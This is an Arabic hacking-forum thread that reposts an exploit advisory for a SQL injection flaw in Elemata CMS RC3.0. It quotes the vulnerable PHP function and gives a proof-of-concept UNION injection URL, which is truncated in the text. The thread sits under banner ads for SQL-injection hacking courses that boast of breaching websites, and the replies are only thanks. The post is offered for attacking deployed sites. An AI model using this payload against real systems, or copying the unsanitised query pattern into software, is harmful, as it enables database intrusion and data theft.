1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

Elemata CMS RC3.0 SQL Injection Vulnerability

الموضوع في '[ ثــغـرات الأعــضــاء]' بواسطة rachi-dz, بتاريخ ‏26 يونيو 2013.

كاتب الموضوع : rachi-dz المشاهدات : 987 الردود : 4 ‏26 يونيو 2013
حالة الموضوع:
مغلق
  1. غير متصل

    rachi-dz
    rankrank
    Developer

    عضو منذ:
    ‏6 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    طالب
    الإقامة:

    السلام عليكم ورحمه الله وبركاتة


    ثغرة جديدة فى سكربت


    Elemata CMS RC3.0


    الثغرة
    كود PHP:
    # Exploit Title : Elemata CMS RC3.0 SQL Injection
    # Date : 23 June 2013
    # Exploit Author : CWH Underground
    # Site : www.2600.in.th
    # Vendor Homepage : http://www.elemata.com/
    # Software Link : http://jaist.dl.sourceforge.net/proj...emataRC3.0.zip
    # Version : RC 3.0
    # Tested on : Window and Linux

    ,--^----------,--------,-----,-------^--,
    | ||||||||| `
    --------' | O .. CWH Underground Hacking Team ..
    `+---------------------------^----------|
    `
    \_,-------, _________________________|
    / XXXXXX /
    `| /
    XXXXXX / `\ /
    / XXXXXX /\______(
    / XXXXXX /
    / XXXXXX /
    (________(
    `------'

    ##############################
    VULNERABILITY: SQL Injection
    ##############################

    /functions/global.php (LINE: 24-30)

    -----------------------------------------------------------------------------
    function e_meta($id)
    {
    include ("Connections/default.php");
    mysql_select_db($database_default, $default);
    $query_meta = "SELECT * FROM posts WHERE id = '
    $id'";
    $meta = mysql_query($query_meta, $default) or die(mysql_error());
    $row_meta = mysql_fetch_assoc($meta);
    -----------------------------------------------------------------------------

    ################################################## ###
    DESCRIPTION FOR SQL INJECTION
    ################################################## ###

    An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
    User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
    An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
    depending on the query, DBMS and configuration.

    POC:

    http://http://localhost/elemata/?id=...L,NULL,NULL--+

    Then View Source !! 
     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    C.T
    rank
    Developer

    عضو منذ:
    ‏10 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: Elemata CMS RC3.0 SQL Injection Vulnerability

    وعليكم السلام ورحمة الله وبركاته

    يعطيك العافية
    :{1}:​
     


  4. غير متصل

    belhadj47
    rankrank
    Developer

    عضو منذ:
    ‏8 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: Elemata CMS RC3.0 SQL Injection Vulnerability

    مشكور أخي جاري تقييمك
     


  5. غير متصل

    mr.mourad <span style="font-weight: bold; text-shadow: #BBBB
    V • I • P

    عضو منذ:
    ‏8 يوليو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: Elemata CMS RC3.0 SQL Injection Vulnerability

    يعطيك العافية اخي شكراً جزيلاً :{1}:
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...